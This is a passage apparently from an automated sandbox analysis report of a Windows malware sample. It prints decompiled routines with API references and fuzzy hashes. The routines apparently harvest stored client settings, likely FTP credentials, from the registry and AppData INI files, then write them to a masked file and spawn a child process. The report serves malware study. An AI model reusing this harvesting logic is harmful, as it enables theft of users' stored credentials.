    										_t155 =  *(_t238 + 0xc) & 0x0000ffff;
    										__eflags = _t155;
    										if(_t155 != 0) {
    											__eflags = _t155 + _t238;
    											_v48 = E0041687F(_t209, _t155 + _t238);
    										} else {
    											_v48 = _v48 & 0x00000000;
    										}
    										_t159 =  *(_t238 + 0xe) & 0x0000ffff;
    										__eflags = _t159;
    										if(_t159 != 0) {
    											__eflags = _t159 + _t238;
    											_v44 = E0041687F(_t209, _t159 + _t238);
    										} else {
    											_v44 = _v44 & 0x00000000;
    										}
    										_t163 =  *_t238 & 0x0000ffff;
    										__eflags = _t163 & 0x00000003;
    										if((_t163 & 0x00000003) != 0) {
    											E00410A7F( *(_t239 + 0x3c),  *(_t239 + 0x38));
    											 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
    											_t167 = E00416474(__eflags,  &_v60, 0x1c);
    											 *(_t239 + 0x38) = _t167;
    											__eflags = _t167;
    											if(_t167 == 0) {
    												E00410A56( &_v60);
    												_t239 = _a4;
    											} else {
    												 *(_t239 + 0x3c) =  *(_t239 + 0x3c) + 1;
    											}
    											goto L55;
    										} else {
    											__eflags = _t163 & 0x0000000c;
    											if(__eflags == 0) {
    												E00410A56( &_v60);
    												L47:
    												_t239 = _a4;
    												goto L48;
    											}
    											_t211 = E0041BF9B( &_v36, _t234, __eflags,  *((intOrPtr*)(_t239 + 0x40)), _v16, 0x40000000);
    											_v40 = _t211;
    											__eflags = _t211;
    											if(_t211 == 0) {
    												L54:
    												E00416421(_t211);
    												E00410A56( &_v60);
    												_t239 = _a4;
    												E00410A7F( *(_t239 + 0x3c),  *((intOrPtr*)(_a4 + 0x38)));
    												_t122 = _t239 + 0x3c;
    												 *_t122 =  *(_t239 + 0x3c) & 0x00000000;
    												__eflags =  *_t122;
    												goto L55;
    											}
    											_t176 = E0041C66D(_t211, _v36);
    											__eflags = _t176;
    											if(_t176 == 0) {
    												goto L54;
    											}
    											_t177 = E004163AC(( *(_t239 + 0x3c) + 1) * 0x1c, _t239 + 0x38);
    											__eflags = _t177;
    											if(_t177 == 0) {
    												goto L54;
    											}
    											 *(_a4 + 0x3c) =  *(_a4 + 0x3c) + 1;
    											E0041645D( *(_a4 + 0x3c) * 0x1c +  *((intOrPtr*)(_t178 + 0x38)),  &_v60, 0x1c);
    											goto L47;
    										}
    									}
    									__eflags =  *(_t238 + 0xc);
    									if( *(_t238 + 0xc) <= 0) {
    										goto L31;
    									}
    									E00406B47( &_v184, _t220, 1,  &_v288);
    									_t186 = E004176C6( &_v112, ( *(_t238 + 0xc) & 0x0000ffff) + _t238, E00416F5E(( *(_t238 + 0xc) & 0x0000ffff) + _t238));
    									__eflags = _t186;
    									if(_t186 == 0) {
    										goto L48;
    									}
    									_t230 =  &_v184;
    									_t212 = 0;
    									__eflags = 0;
    									do {
    										E00416789( *((intOrPtr*)(_t244 + _t212 - 0x6c)), _t230);
    										_t212 = _t212 + 1;
    										_t230 = _t230 + 4;
    										__eflags = _t212 - 0x10;
    									} while (_t212 < 0x10);
    									_v32 = _v32 | 0xffffffff;
    									_t208 = 0x10;
    									 *_t230 = 0;
    									_v24 = _t208;
    									_v20 = 0x80000001;
    									_t191 = RegOpenKeyExW(0x80000001,  &_v288, 0, 1,  &_v20);
    									__eflags = _t191;
    									if(_t191 != 0) {
    										goto L31;
    									}
    									_t195 = RegQueryValueExW(_v20,  &_v184, 0, 0,  &_v80,  &_v24);
    									__eflags = _t195;
    									if(_t195 == 0) {
    										_v32 = _v24;
    									}
    									RegCloseKey(_v20);
    									__eflags = _v32 - _t208;
    									if(_v32 == _t208) {
    										GetLocalTime( &_v96);
    										__eflags = _v74 - _v96.wDay;
    										if(_v74 != _v96.wDay) {
    											goto L31;
    										}
    										__eflags = _v78 - _v96.wMonth;
    										if(_v78 == _v96.wMonth) {
    											goto L48;
    										}
    									}
    									goto L31;
    								}
    								_t220 = _t238 + _t143;
    								_t201 = E0040F851(_t238 + _t143,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
    								__eflags = _t201;
    								if(_t201 == 0) {
    									goto L48;
    								}
    								goto L20;
    							}
    							_t220 = _t238 + _t142;
    							_t202 = E0040F851(_t238 + _t142,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
    							__eflags = _t202 - 1;
    							if(_t202 == 1) {
    								goto L48;
    							}
    							goto L18;
    						}
    						_t203 = E0040FAD7(_t220, _t234, __eflags, 4, _t141,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)), _t208);
    						__eflags = _t203;
    						if(_t203 != 0) {
    							goto L48;
    						}
    						goto L16;
    					}
    					goto L55;
    				}
    				return 0;
    			}

    Address column: 0x0040fb4a to 0x0040fef0

    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: a9b7ca07a222f1cc9e5adc34f01add4efe873fc62e82dd73c76d3fdef0c4f197
    • Instruction ID: 4c275d420296e726cfac787bfccd4499973562296ff6e4c69680185edaf64be6
    • Opcode Fuzzy Hash: a9b7ca07a222f1cc9e5adc34f01add4efe873fc62e82dd73c76d3fdef0c4f197
    • Instruction Fuzzy Hash: 16B1B571900609AADB20EF55C841BFEB7B5FF04304F00453BF952B6A92D778E989CB98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E00414949(char* __ecx, void* __edx, void* __eflags) {
    				void* _v8;
    				signed int _v12;
    				intOrPtr _v16;
    				int _v20;
    				int _v24;
    				intOrPtr _v28;
    				char _v32;
    				char* _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				char _v68;
    				char _v88;
    				char _v108;
    				char _v132;
    				char _v172;
    				short _v260;
    				short _v780;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t65;
    				intOrPtr _t92;
    				int _t104;
    				void* _t110;
    				intOrPtr _t112;
    				void* _t115;
    				int _t120;
    				void* _t125;
    				void* _t132;
    				void* _t135;
    				void* _t136;
    
    				_t119 = __edx;
    				_t118 = __ecx;
    				_t120 = 0;
    				E004164D4( &_v32,  &_v32, 0, 8);
    				_t65 = E004163F1(0xc1c);
    				_v16 = _t65;
    				if(_t65 == 0) {
    					L22:
    					if(_v28 <= _t120) {
    						return E00416421(_v32);
    					}
    					return E0041252D(_t119, _v32, 0xcb);
    				} else {
    					_v36 = _t65 + 0x3fc;
    					_v48 = 0x80000001;
    					_v44 = 0x80000002;
    					E004159A4(0x8a,  &_v260);
    					E004159A4(0x8b,  &_v88);
    					E004159A4(0x8c,  &_v132);
    					E004159A4(0x8d,  &_v68);
    					E004159A4(0x8e,  &_v108);
    					_v12 = 0;
    					do {
    						if(RegOpenKeyExW( *(_t135 + _v12 * 4 - 0x2c),  &_v260, _t120, 8,  &_v8) != 0) {
    							goto L20;
    						}
    						_v24 = _t120;
    						_v20 = 0x104;
    						if(RegEnumKeyExW(_v8, _t120,  &_v780,  &_v20, _t120, _t120, _t120, _t120) != 0) {
    							L19:
    							RegCloseKey(_v8);
    							goto L20;
    						} else {
    							goto L4;
    						}
    						L17:
    						_v20 = 0x104;
    						if(RegEnumKeyExW(_v8, _v24,  &_v780,  &_v20, 0, 0, 0, 0) == 0) {
    							L4:
    							_t122 = _v16;
    							_v24 = _v24 + 1;
    							_t92 = E0041A545(_v8, _t118, _v16,  &_v780,  &_v88, 0xff);
    							_v40 = _t92;
    							if(_t92 != 0xffffffff && _t92 != 0) {
    								_t132 = E0041A545(_v8, _t118, _t122 + 0x1fe,  &_v780,  &_v68, 0xff);
    								if(_t132 != 0xffffffff && _t132 != 0) {
    									_t124 = _v36;
    									_t104 = E0041A545(_v8, _t118, _v36,  &_v780,  &_v108, 0xff);
    									_v20 = _t104;
    									if(_t104 != 0xffffffff && _t104 != 0 && E0041488F(_t119, _t124, _t132 + _v40) > 0) {
    										_t125 = E0041A5FB(_v8, _t118,  &_v780,  &_v132);
    										if(_t125 < 1 || _t125 > 0xffff) {
    											_t125 = 0x15;
    										}
    										_t134 =  &_v172;
    										_t110 = 0x55;
    										E004159A4(_t110,  &_v172);
    										_t112 = _v16;
    										_t118 = _v36;
    										_push(_t125);
    										_push(_t112);
    										_push(_t118);
    										_push(_t112 + 0x1fe);
    										_t119 = 0x311;
    										_t126 = _t118 + 0x1fe;
    										_t115 = E00417114(_t134, 0x311, _t118 + 0x1fe, _t134);
    										_t136 = _t136 + 0x14;
    										if(_t115 > 0) {
    											_t118 =  &_v32;
    											if(E00416815(_t115,  &_v32, _t126) != 0) {
    												_v28 = _v28 + 1;
    											}
    										}
    									}
    								}
    							}
    							goto L17;
    						} else {
    							_t120 = 0;
    							goto L19;
    						}
    						L20:
    						_v12 = _v12 + 1;
    					} while (_v12 < 2);
    					E00416421(_v16);
    					goto L22;
    				}
    			}

    APIs
    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008,?,00000000,00000001), ref: 004149EF
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000001), ref: 00414A1A
    • RegCloseKey.ADVAPI32(?,?,00000000,00000001), ref: 00414B50
      • Part of subcall function 0041A545: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040754A,?,?,00000104,.exe,00000000), ref: 0041A55A
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000,00000001), ref: 00414B3D
      • Part of subcall function 0041A545: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0040754A,?,?,00000104), ref: 0041A5DB
      • Part of subcall function 0041A5FB: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0041130C,?,?), ref: 0041A613
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Open$Enum$CloseEnvironmentExpandStrings
    • String ID:
    • API String ID: 2343474859-0
    • Opcode ID: 07a0b63cc508d11d339d59382726804073fc4fda48303474637d0f48fce4972b
    • Instruction ID: 6a2039ff496709f9cec192769eaa7951ec49cea9462ed4d8c262523992bfbf24
    • Opcode Fuzzy Hash: 07a0b63cc508d11d339d59382726804073fc4fda48303474637d0f48fce4972b
    • Instruction Fuzzy Hash: B3518D72E00118ABDB10DBA9CD45AEFB7BCEF84314F10016AE914F7251DB38AE85CB65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E00414EDD(char* __ecx, void* __eflags) {
    				void* _v8;
    				int _v12;
    				intOrPtr _v16;
    				int* _v20;
    				intOrPtr _v24;
    				char _v28;
    				char* _v32;
    				char _v40;
    				char _v52;
    				char _v64;
    				char _v76;
    				char _v116;
    				short _v180;
    				short _v700;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t55;
    				int _t81;
    				int _t89;
    				int _t93;
    				void* _t99;
    				intOrPtr _t101;
    				void* _t104;
    				int* _t109;
    				char* _t113;
    				void* _t114;
    				void* _t122;
    
    				_t107 = __ecx;
    				_t109 = 0;
    				E004164D4( &_v28,  &_v28, 0, 8);
    				_t55 = E004163F1(0xc1c);
    				_v16 = _t55;
    				if(_t55 == 0) {
    					return _t55;
    				}
    				_v32 = _t55 + 0x3fc;
    				E004159A4(0x97,  &_v180);
    				E004159A4(0x98,  &_v64);
    				E004159A4(0x99,  &_v76);
    				E004159A4(0x9a,  &_v52);
    				E004159A4(0x9b,  &_v40);
    				if(RegOpenKeyExW(0x80000001,  &_v180, 0, 8,  &_v8) != 0) {
    					L20:
    					E00416421(_v16);
    					if(_v24 <= _t109) {
    						return E00416421(_v28);
    					}
    					return E0041252D(0x311, _v28, 0xcb);
    				}
    				_v20 = 0;
    				_v12 = 0x104;
    				if(RegEnumKeyExW(_v8, 0,  &_v700,  &_v12, 0, 0, 0, 0) != 0) {
    					L19:
    					RegCloseKey(_v8);
    					goto L20;
    				} else {
    					do {
    						_t111 = _v16;
    						_v20 = _v20 + 1;
    						_t81 = E0041A545(_v8, _t107, _v16,  &_v700,  &_v64, 0xff);
    						_v12 = _t81;
    						if(_t81 != 0xffffffff && _t81 != 0) {
    							_t89 = E0041A545(_v8, _t107, _t111 + 0x1fe,  &_v700,  &_v52, 0xff);
    							_v12 = _t89;
    							if(_t89 != 0xffffffff && _t89 != 0) {
    								_t113 = _v32;
    								_t93 = E0041A545(_v8, _t107, _t113,  &_v700,  &_v40, 0xff);
    								_v12 = _t93;
    								if(_t93 != 0xffffffff && _t93 != 0) {
    									_t107 = _t113;
    									if(E00416F70(_t113) > 0) {
    										_t114 = E0041A5FB(_v8, _t107,  &_v700,  &_v76);
    										if(_t114 < 1 || _t114 > 0xffff) {
    											_t114 = 0x15;
    										}
    										_t121 =  &_v116;
    										_t99 = 0x55;
    										E004159A4(_t99,  &_v116);
    										_t101 = _v16;
    										_t107 = _v32;
    										_push(_t114);
    										_push(_t101);
    										_push(_t107);
    										_push(_t101 + 0x1fe);
    										_t115 = _t107 + 0x1fe;
    										_t104 = E00417114(_t121, 0x311, _t107 + 0x1fe, _t121);
    										_t122 = _t122 + 0x14;
    										if(_t104 > 0) {
    											_t107 =  &_v28;
    											if(E00416815(_t104,  &_v28, _t115) != 0) {
    												_v24 = _v24 + 1;
    											}
    										}
    									}
    								}
    							}
    						}
    						_v12 = 0x104;
    					} while (RegEnumKeyExW(_v8, _v20,  &_v700,  &_v12, 0, 0, 0, 0) == 0);
    					_t109 = 0;
    					goto L19;
    				}
    			}

    APIs
    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008,?,00000000,00000001), ref: 00414F6B
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000001), ref: 00414F96
    • RegCloseKey.ADVAPI32(?,?,00000000,00000001), ref: 004150CD
      • Part of subcall function 0041A545: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040754A,?,?,00000104,.exe,00000000), ref: 0041A55A
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000,00000001), ref: 004150BA
      • Part of subcall function 0041A545: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0040754A,?,?,00000104), ref: 0041A5DB
      • Part of subcall function 0041A5FB: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0041130C,?,?), ref: 0041A613
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Open$Enum$CloseEnvironmentExpandStrings
    • String ID:
    • API String ID: 2343474859-0
    • Opcode ID: f95dd0abaf67e3b04cb39ecfe929715c0cbcc335c7fbfe7b28f952f2fa6c0c6a
    • Instruction ID: 3724fb91bc42f93588746571fdf883a59e8d16d1d48bead01637dea5031db389
    • Opcode Fuzzy Hash: f95dd0abaf67e3b04cb39ecfe929715c0cbcc335c7fbfe7b28f952f2fa6c0c6a
    • Instruction Fuzzy Hash: 6B515372D00518EBDB20DBE9CD45AEFBBBCEF88304F100166B519E7251DB389E858B65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E0040C50C(void* __eflags, intOrPtr _a4) {
    				signed int _v5;
    				short _v20;
    				char _v40;
    				char _v60;
    				short _v84;
    				char _v112;
    				char _v144;
    				short _v664;
    				char _v1184;
    				short _v1704;
    				char _v2224;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t31;
    				long _t33;
    				void* _t36;
    				void* _t42;
    				void* _t44;
    				void* _t46;
    				long _t50;
    				short* _t58;
    				char* _t65;
    				short _t66;
    				void* _t67;
    				WCHAR* _t70;
    				long _t77;
    
    				_t31 = 0x2a;
    				E004159A4(_t31,  &_v144);
    				_t33 =  &_v1184;
    				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t33);
    				if(_t33 == 0) {
    					_t33 = E0041BCB4( &_v144,  &_v1184,  &_v1184);
    					if(_t33 != 0) {
    						_t36 = 0x2c;
    						E004159A4(_t36,  &_v112);
    						_t33 = E0041BCB4( &_v112,  &_v1704,  &_v1184);
    						if(_t33 != 0) {
    							_t33 = GetFileAttributesW( &_v1704);
    							if(_t33 != 0xffffffff) {
    								_t42 = 0x2d;
    								E004159A4(_t42,  &_v60);
    								_t44 = 0x2e;
    								E004159A4(_t44,  &_v84);
    								_t46 = 0x2f;
    								E004159A4(_t46,  &_v20);
    								_v5 = 0;
    								while(1) {
    									_push(_v5 & 0x000000ff);
    									_push( &_v60);
    									_t67 = 0xa;
    									_t70 =  &_v40;
    									_t50 = E00417114( &_v60, _t67, _t70);
    									if(_t50 < 1) {
    										break;
    									}
    									_t50 = GetPrivateProfileIntW(_t70,  &_v84, 0xffffffff,  &_v1704);
    									_t77 = _t50;
    									if(_t77 == 0xffffffff) {
    										break;
    									}
    									_t50 = GetPrivateProfileStringW(_t70,  &_v20, 0,  &_v664, 0x104,  &_v1704);
    									if(_t50 == 0) {
    										L17:
    										_v5 = _v5 + 1;
    										if(_v5 < 0xfa) {
    											continue;
    										}
    										break;
    									}
    									_t58 =  &_v664;
    									if(_v664 == 0) {
    										L12:
    										if(_t77 != 1) {
    											_t65 =  &_v664;
    											L16:
    											_t50 = E0040C693(0, _t65, _a4, _t90);
    											if(_t50 == 0) {
    												break;
    											}
    											goto L17;
    										}
    										_t50 = E0041BCB4( &_v664,  &_v2224,  &_v1184);
    										_t90 = _t50;
    										if(_t50 == 0) {
    											goto L17;
    										}
    										_t65 =  &_v2224;
    										goto L16;
    									} else {
    										goto L9;
    									}
    									do {
    										L9:
    										if( *_t58 == 0x2f) {
    											_t66 = 0x5c;
    											 *_t58 = _t66;
    										}
    										_t58 = _t58 + 2;
    									} while ( *_t58 != 0);
    									goto L12;
    								}
    								return _t50;
    							}
    						}
    					}
    				}
    				return _t33;
    			}

    APIs
    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 0040C533
      • Part of subcall function 0041BCB4: PathCombineW.SHLWAPI(?,a@,?,004061E6,?,?), ref: 0041BCD3
    • GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0040C587
    • GetPrivateProfileIntW.KERNEL32 ref: 0040C5EA
    • GetPrivateProfileStringW.KERNEL32 ref: 0040C616
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: PathPrivateProfile$AttributesCombineFileFolderString
    • String ID:
    • API String ID: 1702184609-0
    • Opcode ID: ee5d60e2560c634b6b622bb7fc6e87deec0f4774699dd7827841687ae993e67d
    • Instruction ID: 6c9a07ca21c5a1004193c82a9f172541fb47996a04247cf43e65891ec3d9a4f2
    • Opcode Fuzzy Hash: ee5d60e2560c634b6b622bb7fc6e87deec0f4774699dd7827841687ae993e67d
    • Instruction Fuzzy Hash: 7241B3B2900118EADF20EBA48D85EEEB37CAF45354F0006A7E508F71D1D7759E898B69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041C3E6(signed int __edx, void** __esi, void* _a4, signed int _a8) {
    				char _v5;
    				long _v12;
    				void _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _t26;
    				signed int _t29;
    				signed int _t46;
    				void** _t48;
    
    				_t48 = __esi;
    				_t46 = __edx;
    				_v5 = 0;
    				if(_a8 <= 0xa00000) {
    					_t26 = E0041B72E( *__esi);
    					_v36 = _t26;
    					_v32 = _t46;
    					if((_t26 & _t46) != 0xffffffff && E0041B70E( *__esi, 0, 0, 2) != 0) {
    						_t29 = E0041B72E( *__esi);
    						_v28 = _t29;
    						_v24 = _t46;
    						if((_t29 & _t46) != 0xffffffff) {
    							E004164D4( &_v20,  &_v20, 0, 5);
    							_v20 = __esi[4] ^ _a8;
    							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, _a8,  &_v12, 0) == 0 || _v12 != _a8) {
    								E0041B70E( *_t48, _v28, _v24, 0);
    								SetEndOfFile( *_t48);
    							} else {
    								_v5 = 1;
    							}
    						}
    						FlushFileBuffers( *_t48);
    						E0041B70E( *_t48, _v36, _v32, 0);
    					}
    				}
    				return _v5;
    			}

    APIs
      • Part of subcall function 0041B72E: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,004050ED,?,?,?), ref: 0041B743
      • Part of subcall function 0041B70E: SetFilePointerEx.KERNEL32(?,?,?,00000000,?,0041C51A,?,?,00000000,00000001,?,004050ED,?,?,?), ref: 0041B720
    • WriteFile.KERNEL32(?,?,00000005,00000000,00000000,?,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 0041C467
    • WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 0041C480
    • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 0041C4A4
    • FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 0041C4AC
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: File$PointerWrite$BuffersFlush
    • String ID:
    • API String ID: 1289656144-0
    • Opcode ID: b919c28aed449f5b455f04681dfafc2e00bea7100fefa930c18e3d1abca66a8a
    • Instruction ID: a4c3ee71f44642aa1bee8d82d57362cc840c333c05c167429744d83dfaefd4d0
    • Opcode Fuzzy Hash: b919c28aed449f5b455f04681dfafc2e00bea7100fefa930c18e3d1abca66a8a
    • Instruction Fuzzy Hash: 8D317C76804108EEDF119FA4CC81EFEBBB9FF48348F14892AF150A51A5D33A8994DB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040938F(void* __ebx, void* __ecx) {
    				char _v20;
    				char* _v84;
    				char _v92;
    				char _v196;
    				char _v716;
    				void* __edi;
    				void* __esi;
    				void* _t15;
    				void* _t31;
    				void* _t35;
    				void* _t36;
    				char _t37;
    				void** _t43;
    
    				_t36 = __ecx;
    				_t35 = __ebx;
    				_t15 =  *(__ebx + 0x180);
    				if(_t15 == 0 || WaitForSingleObject(_t15, 0) != 0x102) {
    					_t2 = _t35 + 0x17c; // 0x17c
    					_t43 = _t2;
    					E00417E30(_t43);
    					E00406AB8(_t36,  &_v716, _t43, 1);
    					E00406762(0x2937498d,  &_v196, 0);
    					_t37 = 0x44;
    					E004164D4( &_v92,  &_v92, 0, _t37);
    					_v92 = _t37;
    					_v84 =  &_v196;
    					ResetEvent( *(_t35 + 0xc));
    					if(E00417CE8( &_v716, L"-v", 0,  &_v92,  &_v20) != 0) {
    						E0041645D(_t43,  &_v20, 0x10);
    						if(WaitForSingleObject( *(_t35 + 0xc), 0x3e8) == 0) {
    							goto L6;
    						} else {
    							TerminateProcess( *_t43, 0);
    							E00417E30(_t43);
    							goto L3;
    						}
    					} else {
    						L3:
    						_t31 = 0;
    					}
    				} else {
    					L6:
    					_t31 = 1;
    				}
    				return _t31;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(?,00000000,?,74B5F6F0), ref: 004093A7
    • ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001,?,74B5F6F0), ref: 00409401
    • WaitForSingleObject.KERNEL32(?,000003E8,0000017C,?,00000010,?,00403340,00000000,?,?,?,74B5F6F0), ref: 0040943D
    • TerminateProcess.KERNEL32(0000017C,00000000,?,74B5F6F0), ref: 0040944A
      • Part of subcall function 00417E30: CloseHandle.KERNEL32(00000000,74B5F560,004083DE,00000000,00422E10,00000000,00408510,00000000,00000000), ref: 00417E3F
      • Part of subcall function 00417E30: CloseHandle.KERNEL32(00000000,74B5F560,004083DE,00000000,00422E10,00000000,00408510,00000000,00000000), ref: 00417E48
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandleObjectSingleWait$EventProcessResetTerminate
    • String ID:
    • API String ID: 401097067-0
    • Opcode ID: 05c2e9a346c3f8d7005e759078caa7d88eed59f7b54017950ac3717cc000accb
    • Instruction ID: 87de9f73cc55572cfa4e98070ffe2a7e3f6caf6b49dd1d2913febd4432e31a04
    • Opcode Fuzzy Hash: 05c2e9a346c3f8d7005e759078caa7d88eed59f7b54017950ac3717cc000accb
    • Instruction Fuzzy Hash: 9A11A271500208AAEB10AFE5DD49FEF7BBDEF40704F00417AF904F6096DA389946CB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E0040EAF8(void* __eax, void* __ebx, void* __edx, intOrPtr _a4) {
    				short _v44;
    				char _v134;
    				char _v408;
    				char _v532;
    				void* _t22;
    				WCHAR* _t27;
    				WCHAR* _t29;
    				void* _t34;
    				int _t36;
    				void* _t37;
    				WCHAR* _t39;
    				void* _t48;
    
    				_t34 = __ebx - __ebx;
    				0xeccc40c2();
    				 *((intOrPtr*)(_t34 + 0x56)) =  *((intOrPtr*)(_t34 + 0x56)) + __edx;
    				E0041645D(0x422bc8, _a4, 0x1e6);
    				E00406A66(_t37,  &_v532);
    				if(E00416492( &_v408, 0x422bb8, 0x10) != 0) {
    					L8:
    					_t22 = 0;
    				} else {
    					_t39 =  *0x42299c; // 0x0
    					_a4 = E00416F70(_t39);
    					_t36 = E00416F70(0x4229a0);
    					E0041662C(_t24 | 0xffffffff,  &_v134,  &_v44, 0, 0x14);
    					if(_a4 <= _t36) {
    						goto L8;
    					} else {
    						_t27 =  *0x42299c; // 0x0
    						_t48 = _t36 + _t36;
    						if( *((short*)(_t48 + _t27)) != 0x5c || StrCmpNIW(0x4229a0, _t27, _t36) != 0) {
    							goto L8;
    						} else {
    							_t29 =  *0x42299c; // 0x0
    							if(lstrcmpiW( &_v44, _t48 +  &(_t29[1])) != 0) {
    								goto L8;
    							} else {
    								_t22 = 1;
    							}
    						}
    					}
    				}
    				return _t22;
    			}

    APIs
      • Part of subcall function 0041662C: MultiByteToWideChar.KERNEL32(00406B14,00000000,?,00406293,?,?,00406B14,00000000,00000032,77E49EB0,?,00000000), ref: 00416643
    • StrCmpNIW.SHLWAPI(004229A0,00000000,00000000,00000000,00000014,00000010,?,00422BC8,?,000001E6,36D62AA8,?,000000B7), ref: 0040EB84
    • lstrcmpiW.KERNEL32(?,?), ref: 0040EB9C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: ByteCharMultiWidelstrcmpi
    • String ID: Cy$Zy
    • API String ID: 1977948566-282925538
    • Opcode ID: 88cf9c434f92cf7fc4b04606503d0a33092c9ed9318d7d758d676cba07f1480e
    • Instruction ID: 70db405e173d3338e7f1361d82b57a46ea416e25bb8cab9425b6c2b25967f9ec
    • Opcode Fuzzy Hash: 88cf9c434f92cf7fc4b04606503d0a33092c9ed9318d7d758d676cba07f1480e
    • Instruction Fuzzy Hash: F911B671B10118ABDF20EF62DC45EEA7778AB94354F44843BF902A71D0D678E982CB2D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040EAFC(void* __eax, void* __ebx, void* __edx, intOrPtr _a4) {
    				short _v44;
    				char _v134;
    				char _v408;
    				char _v532;
    				void* _t22;
    				WCHAR* _t27;
    				WCHAR* _t29;
    				int _t35;
    				void* _t36;
    				WCHAR* _t38;
    				void* _t47;
    
    				 *((intOrPtr*)(__ebx + 0x56)) =  *((intOrPtr*)(__ebx + 0x56)) + __edx;
    				E0041645D(0x422bc8, _a4, 0x1e6);
    				E00406A66(_t36,  &_v532);
